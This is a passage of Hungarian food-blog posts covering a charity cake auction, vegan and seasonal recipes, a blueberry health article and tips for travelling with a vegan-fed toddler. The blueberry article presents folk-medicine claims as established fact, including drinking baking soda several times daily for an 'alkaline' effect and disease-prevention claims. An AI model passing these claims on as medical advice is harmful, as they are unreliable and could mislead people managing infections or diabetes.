Augusztus elején kaptam az emailt Évától, hogy lenne-e kedvem részt venni az idei őszi Segítsüti jótékony akcióban. Titkon reméltem, hogy egy nap majd kapok egy ilyen felkérő emailt, szóval örömmel mondtam igent a részvételre. A Segítsüti története 2009-ben indult, az első, gasztrobloggerek civil összefogásával született jótékonysági süteményárveréssel. Mostanra kinőtte magát, így évente kétszer kerül már megszervezésre, tavasszal és ősszel. A mostani, 11. alkalommal a Segítsüti támogatottjai a Leukémiás Gyermekekért Alapítványon keresztül a kelet-magyarországi leukémiás megbetegedésben szenvedő gyermekek lesznek. Röviden a részletek (hosszabban pedig itt)… 1) Kik? Ismét 30 gasztroblogger anyuka/apuka készül 30 édességgel, az akció adminisztrációját – beszerzések, pénzügyi elszámolás – pedig szokás szerint a Sose Közhasznú Alapítvány intézi. 2) Mikor? A sütilicit 2014. szeptember 15-én, hétfőn indul, azaz ma fognak megjelenni a sütis bejegyzések az egyes blogokon, és kerülnek fel majd egyidejűleg a licitálós menü alá. Ezután kezdődhet rájuk rögtön a licitálás, amely három napon át zajlik és 2014. szeptember 18-án, csütörtökön 16:00-kor zárul. 3) Kit támogatunk? A befolyt támogatási összegből most a Leukémiás Gyermekekért Alapítványt és rajtuk keresztül a daganatos és vérképzőszervi megbetegedésben szenvedő gyermekek orvosi ellátását, gyógyulását támogatjuk. 4) Hogyan? Minden tepsi sütemény kikiáltási ára továbbra is 1.000 forint lesz. A liciteket a Sütiárverés menüpont alatt lehet majd megtenni, ehhez pedig egy egyszerű regisztráció (név, e-mail cím) szükséges. A nyertes az lesz, aki a legmagasabb összeget ajánlja adott süteményért szeptember 18-án 16:00-ig. Én erre az őszi eseményre egy vegán kókuszos kuglóffal készültem, amibe csempésztem egy kis kardamomot, majd leöntöttem az egészet vegán csokoládé ganache-sal. Jól hangzik, ugye? És én már tudom is, hogy mennyire finom! Aki megteheti, licitáljon a kuglófomra, mert a nyertes licitáló nagyon jól fog járni ezzel a finom sütivel! Fontos infó a nyertes számára, hogy a kuglóf személyesen vehető majd át Budapesten. Hajrá licitálók! Vegán kókuszos kuglóf csokoládé ganache-sal Hozzávalók: A kuglófhoz: - 400 g finomliszt, szitálva - 100 g teljeskiörlésű liszt, szitálva - 120 g kókuszvirág cukor + 1 teáskanál (nádcukorral helyettesíthető) - 30 g kókuszreszelék - 30 g puha kókuszzsír - 250 ml kókusztej (kókuszos rizstejjel helyettesíthető) + amennyit a tészta felvesz (kb. 150-200 ml) - 1/2 teáskanál kardamom - 1 csomag (7 g) szárított élesztő - csipet só A ganache-hoz: - 20 g kakaópor/karobpor, szitálva - 1 evőkanál mandulavaj - 50-60 ml juharszirup - 40 g kókuszzsír - csipet só Egy tálban keverjük össze: liszteket, kókuszreszeléket, kókuszvirág cukrot, sót és kókuszzsírt. Langyosítsuk meg a kókusztejet, adjuk hozzá az élesztőt és 1 teáskanál cukrot, hagyjuk felfutni néhány perc alatt, majd öntsük a lisztes keverékhez. Keverjük össze a tésztát, majd kézzel dagasszuk át és közben adagoljunk hozzá annyi kókusztejet, amennyit a tészta felvesz (ez kb. 150-200 ml lesz a növényi tej fajtájától függően). Az összegyúrt tésztát a tálban hagyva, fedjük le konyharuhával és hagyjuk meleg helyen duplájára kelni (ez kb. 1 óra). A megkelt tésztát borítsuk lisztezett deszkára és gyúrjuk át. Formázzunk rudat belőle, gyengéden csavarjuk meg és tegyük bele a puha kókuszzsírral kikent kuglóf formába (a végeket szorosan összecsipkedjük). A formában újból pihentetjük 30 percet, majd 170 fokra előmelegített sütőben kb. 40 perc alatt aranybarnára sütjük. Tűpróbával ellenőrizzük, hogy átsült-e! Hagyjuk a formában kihűlni. A ganache-hoz egy lábasban melegítsük át a juharszirupot, a kókuszolajjal, a mandulavajjal és a kakaóval. A tűzhelyről levéve adjuk hozzá a csipet sót. A langyosra hűlt ganache-sal locsoljuk meg a kihűlt kuglófot.
Rókagomba paprikás puliszkával
2014. szeptember 9. Fittanyuka
Rókagomba igazi ínyencség. Erdélyben vadon terem és úton-útfélen árulják a “szedők”, nyár derekától egészen ősz végéig. Kimondottan erdélyi fogás a gombapaprikás puliszkával vagyis főtt kukoricadarával. Friss gombából készítettem, természetesen ha nincsen kéznél utcai rókagomba – árus akkor bármelyik kedvenc gombafajtánk megteszi. A gomba nem a könnyen emészthető ételek csoportjába tartozik, de a megfelelő társításokkal, fűszerekkel segíthetjük ezt a folyamatot. Az emésztést segítő fűszerekhez tartozik a magyar konyha jellegzetes fűszerei, mint például az őrölt kömény, édesnemes pirospaprika. Én még csempénsztem bele egy kevés őrölt kardamont, amely szintén puffadásgátló, emésztést segítő, erjedésgátló. A kukoricadara könnyen emészthető, gluténmentes köret. Hozzávalók 4 főre: 500-600 g rókagomba 2-3 kk himalaya só 200 ml kókusztejszín 2 evőkanál kukoricadara 1 evőkanál kókuszolaj késhegynyi őrölt kömény 1 kk édesnemes pirospaprika 1 cikk fokhagyma 1 fej vöröshagyma 2,5 dl bögre kukoricadara A vöröshagymát apróra vágjuk és a kókusz olajon megdinszteljük, majd a megtisztított, leforázott gombát, szűrés után a hagymára “dobjuk” és együtt pároljuk. 5 perc után hozzáadjuk a fűszereket, a kókusztejszínt elkeverjük csomómentesen a keményítővel, 1-2 dl vízzel és hozzáöntjük a gombához. Állandó keverés mellett besűrítjük és utófűszerezzük ha szükséges, belepréseljük a fokhagymát. A kukoricadarát négyszeres mennyiségű vízben, 2 kk sóval, állandó keverés mellett puhára főzzük. Tipp: a darát lobogó vízbe tesszük. Majdnem olyan gyorsan elkészül, mint ahogyan leírtam:). Ideális fogás ebédre a rohanó hétköznapokban.
Cukormentes rebarbarás szederlekvár
2014. szeptember 5. Zizi kalandjai
Igyekszem kihasználni az utolsó pillanatokat… amíg lehet kapni nyár végi gyümölcsöket a piacokon, addig veszem és fogyasztom őket. Na persze nem csak én, hanem az egész család. Amikor elkezdtem előkészíteni ennek a lekvárnak a hozzávalóit, Ádi rákattant a szederre és alig bírtam lebeszélni néhány szem után, hogy erre anyának most nagy szüksége van, mert fotóznia kell, meg lekvárt főzni belőle. Ígértem neki őszibarackot cserébe, szerencsére elfogadta, így most ez a bejegyzés is megszülethet! Nagyon egyszerű a dolog… végy egy adag szedret, egy adag rebarbarát, keverd össze egy kis juharsziruppal, citromlével és citrom reszelt héjával és főzz belőle lekvárt. Ennyi! Nem vagyok egy nagy lekvár főző, na nem azért, mert nem szeretem enni és csinálni, hanem mert helyem nincsen tárolni. Ez a szederlekvár nem lesz nagy adag és hűtőben tartva maximum 2 hétig áll el, szóval gyorsan kell fogyasztani, de szerintem ezzel nem lesz gond! Nem tudom, hogy ti járatok-e már úgy, hogy próbáltátok egy citromnak a héját reszelni, de a reszelő nem volt elég éles és így a citrom héja csak maszatolódott a reszelőn. Nos, én számtalanszor jártam így… nem igazán panaszkodtam I.-nek erről, de valamit megérezhetett, mert egyik évben kaptam tőle egy Microplane reszelőt karácsonyra. Neki fogalma sem volt, hogy létezik a Microplane és, hogy én titkon vágytam egyre, de az eladó az üzletben rábeszélte, hogy vegye meg a gasztroblogger barátnőjének, mert ennek biztosan örülni fog. Hát, amikor kinyitottam az ajándékot, sikítoztam: “Úristen, van végre Microplane reszelőm!”. I. meg örült, hogy milyen jól választott ajándékot! Hát így indult a történetem a Microplannel. Nemrég pedig csomagot és lehetőséget kaptam a Microplane magyarországi forgalmazójától, hogy az egyik terméküket, a Citrus Bajnokot teszteljem. Szuper tuti, bika éles kis reszelő rozsdamentes acél pengékkel (melyek orvosi fémből készülnek). A nyél alján található kör alakú pengékkel mesteri spirálokat készíthetünk a citrusok héjából, amit aztán koktélokba, vagy díszítésként is használhatunk (na én ezt még nem teszteltem, de egy koktélpartin biztosan be fogom vetni). Szóval egy Microplane reszelő nem maradhat ki a háztartásunkból, ha egy minőségi, tartós, éles társra vágyunk a konyhában! Na, de jöjjön már a recept, ugye? Cukormentes rebarbarás szederlekvár Hozzávalók: - kb. 260 g szeder - kb. 260 g rebarbara (5-7 szál, mérettől függően), felkockázva - 1/2 bögre juharszirup - 1 citrom reszelt héja - 1 evőkanál frissen facsart citromlé Egy lábasban keverjük össze a hozzávalókat és közepes lángon tegyük fel főzni. Kb. 10 perc után, a gyümölcs kezd egy kicsit összeesni, ekkor fakanállal nyomkodjuk egy kicsit pépesre a gyümölcsöket. Forraljuk fel, majd közepes lángon főzzük 25-30 percig, amíg besűrűsödik. Töltsük fertőtlenített üvegekbe, majd ha kihűlt tegyük hűtőbe fogyasztásig. Vegyük le az üveg fedelét… És fogyasszuk a lekvárt friss kuglófra kenve… ***** A Microplane Citrus Bajnok reszelőt a Grater Hungary Kft. biztosította a teszteléshez. A véleményem csakis a sajátom.
Paradicsomos bruschetta és egy kis napsütötte Toszkána
2014. augusztus 30. Zizi kalandjai
Az elmúlt években jártunk néhányszor Toszkánában – olyan barátok meghívásának köszönhetően, mint Giulia és Emiko -, de sajnos egy bejegyzés sem született belőle, noha az inspirációt és a jobbnál jobb recepteket megkaptam, amikor ott jártunk. A napokban eszembe jutott, hogy lassan vége a paradicsom szezonnak – mert ugye télen nincsen paradicsom -, szóval, amíg lehet élvezni kell ezeknek a (végre!) napsütötte golyócskáknak az édes, szaftos zamatát. Be is ugrott, hogy van egy ezer éve lefotózott, elfekvőben lévő recept, aminek még most éppen aktualitása is van, így összeszedtem a képeket és végre nekiálltam ennek a bejegyzésnek. Két éve jártunk a toszkán tengerparti szakaszon. A bázisunk Cecina-ban volt, egy családi apartmanban, ahol nyolcan tanyáztunk és szinte ahányan voltunk, annyi nemzetet képviseltünk – belga, olasz, amerikai-német, ausztrál-japán, magyar -. Az étkezésre nagy gondot fordítottunk, többnyire olasz ételeket főztünk, de igyekeztünk a gyorsaságra helyezni a hangsúlyt, hogy minél több időt tölthessünk a tengerparton vagy éppen egy környékbeli piacon. Ott a helyszínen is készítettünk bruschettát, amit aztán itthon is megcsináltam. A recept hihetetlen egyszerű, ezért, mint minden egyszerű receptnél, a hangsúly itt is az alapanyagok minőségén van. Paradicsomos bruschetta (Recept: Giulia második szakácskönyvéből, I Love Toscana) Hozzávalók: - néhány szelet jó minőségű kovászos kenyér, megpirítva - 400 g paradicsom, felkockázva - 2 gerezd fokhagyma - extra szűz olívaolaj - friss bazsalikom, felaprítva - só, frissen őrölt bors Tegyük egy tálba a felkockázott paradicsomot, ízesítsük sóval, borssal. Keverjük össze két evőkanál olívaolajjal, egy felaprított fokhagyma gerezddel és a bazsalikommal. Tegyük a hűtőbe és hagyjuk állni, hogy az ízek összeérjenek két-három óra alatt. Pirítsuk meg a kenyér szeleteket, extraként megkenhetjük a másik gerezd fokhagymával (aki nem fokhagyma őrült, az kihagyhatja ezt a lépést ). Kanalazzunk a kenyér szeletekre az aprított paradicsomból. Tálaláskor önthetünk még rá egy kevés olívaolajat. Tipp: a friss bazsalikom mellett adhatunk hozzá még oregánot és mentát is. ***** Néhány kép az utazásról… Készül az autentikus bruschetta Cecina
Őszibarackos pite + Nyereményjáték
2014. augusztus 12. Zizi kalandjai
Már régóta vágytam egy olyan pitére, ami tele van gyümölccsel és az alján és tetején is van tészta… akár flancosan, olyan keresztbe font tésztacsíkokkal borítva, de a sima egyszerű tészta bevonat is megteszi… gondoltam. Végül nem extráztuk, csak egy sima borítást kapott a süti, de isteni finom lett. Szaftos, sűrű, szirupos, édes barackok vékony tészta között megsütve. Ezt tálaláskor megfejeltük néhány gombóc vanília fagyival… hát mit mondjak… régen ettem már isteni finom házi sütit, de ez megérte a fáradozást! Sok-sok fotó készült a pite készítésekor, mert egy barátomnak fotóztunk mérő cupokat “munka” közben. Ezek nem akármilyen mérő cupok: szép pirosak, egymásba helyezhetők, könnyen tisztíthatók, felakaszthatók, ráadásul még össze is csukhatók, így nagyon kis helyen is elférnek és könnyű magunkkal vinnünk például egy nyaralásra (én is viszem magammal a Balatonra ), ha esetleg sütnénk, főznénk a vakáció alatt is. Ezekből a fotókból láthattok néhányat a bejegyzésben, ha pedig nyerni szeretnétek magatoknak egy négy darabos mérő cup szettet, akkor ne habozzatok játszani a bejegyzés végén. (A mérő cupok ellenére a recept hozzávalói grammban vannak megadva, a fotók a cupok használatban való szemléltetését segítik. A megadott tészta mennyiség egy kb. 22 cm-es és egy 18 cm-es kerek pite formára elegendő.) Őszibarackos pite (Recept: Jul’s Kitchen) Hozzávalók a tésztához: - 225 g simaliszt - 150 g zabliszt - 240 g hideg vaj, felkockázva - 150 ml jéghideg víz - 1 teáskanál só Hozzávalók a töltelékhez: - 1000-1500 g őszibarack vagy nektarin - 100 g nádcukor + 2 evőkanál a szóráshoz - 4 evőkanál liszt - 1 db citrom kifacsart leve - 1 vaníliarúd kikapart magjai - fahéj - csipet só - citromfű (opcionális) - vanília fagylalt (opcionális) Egy tálban keverjük össze a liszteket a sóval, majd adjuk hozzá a vaj kockákat és minél gyorsabban morzsoljuk el a tésztával. Lassan adagoljuk hozzá a vizet lépésről lépésre és gyúrjuk össze ruganyos tésztává. Formázzunk belőle labdát, csomagoljuk folpackba és tegyük hűtőbe legalább egy órára. Közben készítsük el a tölteléket. Mossuk meg a barackot/nektarint, magozzuk ki és vágjuk fel kockákra. Tegyük a felkockázott barackot egy tálba, szórjuk meg a nádcukorral, a liszttel, majd adjuk hozzá a citromlevet, a vaníliát, a fahéjat és a sót. Jól keverjük össze és tegyük félre. Vegyük ki a hűtőből a tésztát és vágjuk négy részre. Amíg eggyel dolgozunk, a többit tegyük vissza a hűtőbe. Lisztezett deszkán nyújtsuk ki kb. fél miliméter vastagra, majd helyezzük az egyik kivajazott, kilisztezett formába, villával szurkáljuk meg (hogy sülés közben ne púposodjon fel). Kanalazzuk bele a barack felét, majd óvatosan tegyük rá a másik kinyújtott tésztát. A feleslegesen lelógó tészta darabokat vágjuk le és egyengessük el a szélét villával. A tetejére késsel vágjunk vékony nyílásokat, szórjuk meg egy evőkanál nádcukorral, majd tegyük a mélyhűtőbe 10 percre pihenni. A maradék tésztával, gyümölccsel ismételjük meg a folyamatot még egyszer. Melegítsük elő a sütőt 220 fokra és süssük a pitét 10 percig. Utána vegyük le a hőfokot 190-re és süssük további 20-25 percig, amíg a pite teteje aranybarnára pirul és a gyümölcs szirupos leve kibugyog(hat) egy kicsit a formából. Várjuk meg teljesen, amíg kihűl a pite és csak utána vágjuk fel. Tálaljuk citromfűvel, vanília fagyival. ***** NYEREMÉNYJÁTÉK! Nyeremény : három darab négy darabos cup készlet három szerencsés nyertesnek! A feladat csak annyi, hogy írjátok meg kommentben (ide a bejegyzés alá), hogy melyik a kedvenc receptetek a blogomról. Ha extra pontokért is játszani szeretnétek, akkor töltsétek ki az alábbi formula minden pontját! Vagyis a számok (+4, +4, +4, +10) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. a Rafflecopter giveaway Szabályok : 2014. augusztus 17-ig lehet játszani. Eredményhirdetés 2014. augusztus 18-án. A nyerteseket emailben fogom értesíteni, majd a nevük kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesek a nyereményt személyesen vehetik át vagy magyarországi címre postázom.
Magyaros cukkíni-paprikás
A mai ebéd is a cukkíniről szólt,ki gondolta volna :D :D :D Nagyon fini ez a változat is ;) Hozzávalók: 1 kisebb cukkíni 1 kisebb fej vöröshagyma 1/2 kápia paprika 1 paradicsom 1 kisebb csokor friss majoranna 1 kisebb csokor petrezselyem só, pirospaprika 1 ek hidegen sajtolt olaj 5-6 szem áztatott mandula A cukkínit megmossuk, […]
Áfonya, a bogyós gyümölcsök királya
2014. július 22. Éltető ételek
Az áfonya egy nagyon értékes bogyós gyümölcs. Népszerűsége nem véletlen, rendkívül ízletes és egészséges. Elmondható róla, hogy "kicsi a bors, de erős". Mármint a kis mérete ellenére hatalmas tápértékkel bír, és kiemelkedően magas az antioxidáns tartalma is. Nemcsak a bogyóját fogyaszthatjuk, hanem a levele is számos betegség kezelésére alkalmas. A növényről bővebben Az áfonya botanikai neve a Vaccinium, ami mintegy 200 fajt takar szerte a világban. A magasbokrú fajok Észak-Amerikában és Ausztráliában őshonosak. Régóta ismert és fontos része az amerikai indiánok étrendjének. Rájöttek arra, hogy ha az áfonyával bedörzsölik a szárított húsokat, akkor lassíthatják azok romlását. Az egész növényt megfőzve hasmenés kezelésére használták. Nálunk a legelterjedtebb a kis növésű fekete áfonya, vagy más néven az erdei áfonya. A FEKETE ÁFONYA (Vaccinium myrtillus) gyümölcse már évszázadok óta ismert és kedvelt; az orvostudomány először a XVI. században említi gyógyhatását. A VÖRÖS ÁFONYA (Vaccinium vitis-idaea) a Kárpátokban (Erdély) őshonos, gyógyhatása a népgyógyászatban is ismert. A fekete áfonya 20-40 cm magas lombhullató törpecserje , ágai szögletesek, zöldek. Levelei szórtak, ellipszis alakúak vagy tojásdadok, finoman fűrészes szélűek. Rózsaszín csengettyű alakú, bókoló virágai egyesével, vagy párosával nyílnak a levélhónaljakban. Termése borsószem nagyságú bogyó, éretten kékesfekete, leve lilás. Az áfonya csak savanyú kémhatású talajon él meg, ilyen pedig kevés van hazánkban. Többnyire magasabb domb- és hegyvidékeken fordul elő. Gyakori Sopron és Vas megyében (Alpokalján), de megtalálható a Mátrában, a Bükkben és a Hegyalján is. A drogja a levele, amelyet akár egész nyáron gyűjthetünk, valamint a termése, amely július, augusztus folyamán érik. A vörös áfonya alacsony termetű örökzöld cserje , mindössze 15-30 cm magas. Levelei 2-3 cm hosszúak, bőrneműek, merevek, szélük kissé csipkézett. A levelek fonákán barnás pontok láthatók, erezetük szárnyas. Virágai fehérek vagy rózsaszínűek, bókolók. Termése vörös bogyó, íze savanykás, kesernyés. Hegyvidéki faj. Elsősorban a Kárpátokban (Erdélyben) elterjedt, különösen a nyirkosabb fenyvesekben, tőzeglápok környékén. Havasi meggynek és fenyvesbogyónak is nevezik. Magyarországon ritka, védett faj. Milyen hatóanyagokat tartalmaz az áfonya? A fekete áfonya levele tartalmaz cseranyagot, flavonoidokat, szerves savakat, vitaminokat (A,B,C), pektint, arbutint, ásványi anyagokat (króm, mangán). A termése szintén tartalmaz cseranyagot, flavonoidokat, aromás savakat, antociánglikozidát, gyümölcssavakat, vitaminokat, pektint. A kék színét a mirtillin antocianinnak köszönheti. A vörös áfonyának is a drogja a levele, amelyet szeptemberben, októberben gyűjtenek. Fő hatóanyaga az arbutin nevű fenolos glikozid (sokkal több van benne, mint a fekete áfonya levelében). Az arbutinról tudni kell, hogy kiváló húgyúti ferőzések esetén. Antioxidáns védelem Antocianin tartalmának köszönhetően - amely kiemelkedően magas (430 mg/100g) - erős antioxidáns tartalommal bír . A Journal of Clinical Nutrition folyóiratban közzétett tanulmány megállapította, hogy azoknak, akik napi 15 dkg áfonyát fogyasztottak rendszeresen, a vérben lévő antioxidánsok mennyisége jelentősen megemelkedett. Ez elengedhetetlen a különböző szív- és érrendszeri megbetegedések, a cukorbetegség, az öregedés, a rák, a makula degeneráció és a szürkehályog kialakulásának megelőzéséhez. Az ismeretes, hogy a vérben lévő antioxidánsok fokozott jelenléte csökkenti a mellrák kialakulásának kockázatát, de a kutatási eredmények azt is alátámasztják, hogy az áfonya képes csökkenteni, és megelőzni az öregkori betegségeket (mint például az Alzheimer-kór és az elbutulás). Szív- és érrendszeri betegségek megelőzése Az áfonya kiemelkedően magas antioxidáns tartalma jótékonyan hat a keringési rendszerre. Érfalvédő, csökkenti a hajszálerek törékenységét, a kapillárisok áteresztőképességét, megakadályozza a vérrögképződést. Javítja a mikrokeringést, hatásos visszér esetén is. Az áfonya rendszeres fogyasztása segít fenntartani az egészséges vérnyomás értékét. Az áfonya hatása a diabéteszre Bizonyítottan csökkenti a vércukorszintet, ezért a teakaverékek fontos része az áfonya levele. Táplálkozási szakértők az áfonyát jellemzően alacsony glikémiás indexű (GI) gyümölcsnek tartják (40-53GI). A szemre gyakorolt hatása A terméséből készült főzet és maga a gyümölcs is javítja a látást a csökkent fényviszonyoknál (szürkületi vakság kezelése A-vitaminnal). Szembevérzések után, a cukorbetegek látószervi elváltozásai során szintén alkalmazható. Gyomor - bélrendszeri hurut kezelése A levél és a termés cseranyag tartalmának köszönhetően összehúzó (adsztringens) hatása van , amely segíti a gyulladásban lévő gyomor és nyombél nyálkahártya épségének helreállítását (pl. hasmenés esetén). A mirtillin védőréteget képez a bélsejtek nyálkahártyáján, ami ellenáll a mechanikus izgatásnak, és a gyulladást is gátolja. Szájüregi gyulladások esetén is lehet öblögetni vele. Ugyanakkor a friss termés nagyobb mennyiségben fogyasztva hashajtó hatással bír. Húgyúti gyulladások kezelése Az arbutin tartalmának köszönhetően (a vörös áfonya levelében sokkal több arbutin van, mint a fekete áfonyáéban) kiváló a húgyutak fertőtlenítésére , vesemedence gyulladás, húgyhólyag gyulladás esetén is bevethető. Prosztata megnagyobbodáskor kiválóan társítható pl. az aranyvesszővel. Antibakteriális hatása érvényesül, a mirtillin kötődik a baktérium sejtekhez, behatol mind az élő, mind az elpusztult sejtekbe, és megfesti azokat. A bejutott festék károsítja a baktérium anyagcseréjét, gátolja a növekedését. Vizelethajtó , szélhajtó hatása is ismeretes. Vesekő, vesehomok kiürülését segíti, megakadályozza a kő okozta pangást és fertőzést. FIGYELEM! Hatása csak lúgos környezetben érvényesül. Ezért minél több nyers, lúgosító növényi táplálékot kell fogyasztani, és naponta 3-5 alkalommal érdemes egy késhegynyi szódabikarbónát is bevenni. De akár lúgos ásványvíz is fogyasztható. Ebben az időszakban kerüljük a hús és a tej fogyasztását (savas hatása miatt). Az áfonya fogyasztása A vörös áfonya leveléből készíthetünk gyógyteát , amelyet bakteriális eredetű húgyúti gyulladás során fogyaszthatunk. 2 evőkanál levelet forrázzunk le 3 dl forró vízzel, és főzzük legalább 15 percig. Majd még hagyjuk állni legalább ugyanennyi ideig, és szűrjük le. A tea felét reggel éhgyomorra igyuk meg, a többit pedig a nap folyamán kortyolgassuk. 3 napig igyuk ezt a teát, majd vizelethajtó gyógytea alkalmazható a továbbiakban (pl. kukoricabajusz, cseresznyeszár) A fekete áfonya levele élvezeti teaként fogyasztható, szamóca, szeder vagy málna levelével keverve akár mindennapos fogyasztásra is alkalmas. A mindennapokban a termését nyersen fogyaszthatjuk , de felhasználhatjuk szörpök, lekvárok, gyógyborok készítéséhez is. Finom szósz, gyümölcskrém vagy akár tortakrém készülhet a gyümölcsből, de szárítva vadhúsok mellé mártások alapanyaga lehet. Az áfonyabor erősítő hatású , öregkori krónikus bélhurutos állapotokat kedvezően befolyásolja. A vörös áfonya terméséből előállított szeszes kivonat bőrgombásodás ellen bevethető. A piros bogyója nagyon fanyar, ezért inkább aszalva fogyasztjuk, vagy süteményekbe, lekvárba kerülhetnek. Híres az erdélyi áfonya pálinka is. Felhasznált irodalom: - Rácz Gábor: Gyógynövényismeret: a fitotterápia alapjai. - Budapest: Sanitas, 1992 - Rápóti Jenő, Romváry Vilmos: Gyógyító növények. - Budapest: Medicina, 1987 - http://dietless.hu/afonya/
Utazás külföldre (vegán étrenden lévő) kisbabával
2014. július 17. Zizi kalandjai
Összegyűjtöttem néhány dolgot, amiket az utazás során tanultunk, tapasztaltunk vagy bevált számunkra egy kisbabával történő utazás alatt. A londoni utat a 13 hónapos kisfiunkkal, Ádámmal csináltuk, aki vegán étrenden van és két-három alkalommal (reggel, este és éjszaka) még szopizik (a blog bejegyzést korábban kezdtem el írni, azóta már csak egyszer van szoptatás, reggelente!). Remélem hasznos lesz számtokra a leírt néhány információ. Ha van saját tapasztalatotok, amit feltétlen szeretnétek megosztani, azt írjátok meg a bejegyzés alá kommentben, így mindannyian tudunk tanulni belőle. 1. Legyünk rugalmasak! Ez az első és legfontosabb szabály: RUGALMASSÁG! Természetesen szerettem volna mindent kipipálni a listámról, amit felírtam magamnak, hogy hova menjünk el feltétlenül, de az élet közbeszólt, így inkább lazábbra vettük a gyeplőt, mint, hogy rohanjunk egyik helyről a másikra, plusz ugye figyelembe kellett vennünk egy 13 hónapos igényeit is, akiről érdemes tudni, hogy az egész út alatt (repülés, városnézés, shopping, stb.) mintagyerekként viselkedett. Jó pár tervezett helyre azért eljutottunk, meg olyanokra is, amelyekre az út során bukkantunk. A napi ritmusunkat megtartottuk, de nyilván ebéd után nem rohantunk haza, hogy Ádi aludni tudjon, hanem aludt inkább a babakocsiban, amíg mi nézelődtünk vagy leültünk egy bambira valahol. A napok eléggé elhúzódtak, az egy órás időeltolódás sokat számított, meg az is, hogy északabbra voltunk, este 9 órakor még sütött a nap, így mindennap későn fektettük le Ádit. Úgy voltunk vele, hogy nyaralás alatt ez megengedhető, ha hazaérünk, majd visszaállunk az eredeti fektetési időpontra. Néhány napra szükség volt rá, de utána helyreállt a rend és azóta a szokásos időben fekszik Ádi. 2. Válasszunk gyerekbarát szállást! Olyan helyet kerestünk, ami közel van a konferencia helyszínéhez, így napközben is láthattam Ádit, mert I. be tudta hozni. Először hotelre gondoltunk, de aztán az AirBnB-n böngészve találtunk egy családot, akik azon a környéken laknak, ahol a konferencia is volt, így írtunk nekik. Kiderült, hogy két kisgyerekük van, nagyon szimpatikusnak találtuk az egész családot, így elhatároztuk, hogy hozzájuk megyünk. Mindenképpen jó döntés volt, mert náluk a kisgyerekek miatt volt etetőszék, kiságy, mosógép, szárítógép, játékok, stb. – amelyek a mi rendelkezésünkre is álltak és nagyon megkönnyítették a mindennapjainkat. Nem beszélve a család hatalmas konyhájáról (sok-sok plusz pont részemről ), a jó környékről (sok park, játszótér a közelben) és hogy egy angol család személyében nagyon kedves barátokra találtunk. 3. Vigyük a babakocsit és a hordozót is! Igen, mindkettőre szükség van! Pont az utazás előtt két nappal egy “apróbb baleset” történt az esernyőre csukható babakocsinkkal, így gyors körbe telefonálás után kiderült, hogy az egyik család kölcsön tudja adni a babakocsiját. A becsekkoláskor rárakják a szalagot, de a babakocsit vihetjük egészen a repülőgépig, akkor kell leadni és berakják a csomagtérbe. Érkezéskor pedig a táskákkal, bőröndökkel együtt a forgó szalagra pakolják. A babakocsiban nagyon jókat aludt Ádi délutánonként, plusz sok csomag ráakasztható, így nem kell cipekednünk. A hordozót is használtuk néhányszor (nekünk Ergo Baby van), főleg, ha Ádi igényelte, hogy egy kicsit karban tartva vigyük, könnyebb volt a hordozóba beletenni és úgy vinni. Ugye magasabbról szemléli a világot a hordozóból, szóval változatosság szempontjából is jó néha a babakocsit hordozóra cserélni. 4. Használjuk ki, hogy babával utazunk! Volt néhány hely, ahol nem akartuk kivárni a hosszú sort (pl. Gatwick reptéren érkezés, útlevél ellenőrzés), így előre mentünk és megkérdeztük, hogy a babával soron kívül mehetnénk-e. Természetesen előre engedtek minket, így nagyon sok időt (és esetleg hisztit is ) megspóroltunk magunknak. Ezután igyekeztük kihasználni az ilyen szituációkat. Az esetek 98%-ban mindig előre kerültünk és volt olyan is, hogy szóltak nekünk, hogy máshol álljunk sorba, ami külön gyerekeseknek van fenntartva, így gyorsabban sorra kerülhetünk. 5. Étkezés Néhány dolgot vittünk magunkkal, mert noha Londonba utaztunk, ahol elég könnyen tud egy vegetáriánus/vegán étkezni, azért babával nem olyan könnyű mindent megoldani. Reggeli Mi felnőttek kibírtuk volna az első kávézóig, reggeliző helyig egy pohár vízzel is, de nyilván Ádival nehéz lett volna megértenem, hogy az első legközelebbi helyen reggelizünk. Abban sem voltam azért biztos, hogy minden ilyen helyen van növényi tej, stb., így jobbnak láttam, hogy a reggelit otthon intézzük el. Kis tasakokba csomagoltam a napi tönkölydara vagy zabpehely adagokat (fahéjjal fűszerezve), így nem vittünk felesleges mennyiséget és azonnal tudtuk lábasba tenni. Rizstejből kis dobozosokat vittünk, mert az egy literes nem biztos, hogy elállt volna a hűtőben egy hétig, így egyszerűbb volt a kis dobozosokat használni. Ha éppen nem használtuk fel a teljes adagot, akkor a másnapi kásába még jó volt. Vittünk bio almát is a reggeli kásákhoz minden napra egyet, ehhez persze kellett a baba reszelő. Vittünk cumisüveget, előkét, kistányért és evőeszközöket, valamint a Philips Avent poharaiból néhány darabot, amibe jól lehet pakolni kölesgolyót, áfonyát, stb. Szóval minden reggel teli pocival indultunk útnak. Ebéd, vacsora, snack Az első néhány napra vittünk magunkkal bio babaételt is, arra az esetre, ha éppen ebédidőben nem vagyunk olyan helyen, ahol ebédelni tudunk, akkor Ádinak legyen azonnal ennivalója. Ezeket meg is ette szépen lassan, így csökkent a bőrönd súlya, lehetett vásárolni a helyére! A Whole Foods Market gyakran látogatott hellyé vált, a frissen facsart zöldség- és gyümölcsleveit mindennap itta Ádi, ezenkívül minden gyerek kap egy ingyen gyümölcsöt (banán, alma, narancs) ajándékba, ha a szülők vásárolnak valamit. A Borough Market-on volt elég sok lehetőség vegetáriánus és vegán ételt enni, így az egyik ebédet ott oldottuk meg, a földre leülve dobozkákból fa evőeszközzel toltuk a finom falatokat. Ádi is élvezte nagyon. Egyik nap pedig piknikeztünk a Kensington Gardenben. Nem csináltunk belőle problémát (és itt jön be az első pont: rugalmasság), ha Ádi nem evett főtt (vagy lehet, hogy főtt volt, csak nem meleg) ételt egy nap, a lényeg az volt, hogy jól lakjon finom tápláló ételekkel. Az avokádó elég olcsó és jó minőségű, így sokszor evett vacsorára avokádót teljeskiörlésű kenyérrel. Rengeteg gyümölcsöt evett napközben, volt, hogy betolt 200 gramm áfonyát vagy málnát és persze elmaradhatatlan volt – a szülők számára is életmentő – kölesgolyó, amit bármikor be tudtunk vetni, ha kezdett nyűgös vagy éhes lenni. Szintén itthonról vittem kölest, amit egyik nap meg is főztünk vacsorára neki. A konferencián kaptam egy bio konzerv levest – tudom, konzerv levest adok a gyereknek? De ez bio és az összetevőit illetően csak zöldség, rizs, víz, só és fűszerek voltak benne. Jó sűrű volt, szóval inkább főzelékszerű és jól passzolt a köleshez. Nemcsak Ádinak ízlett, 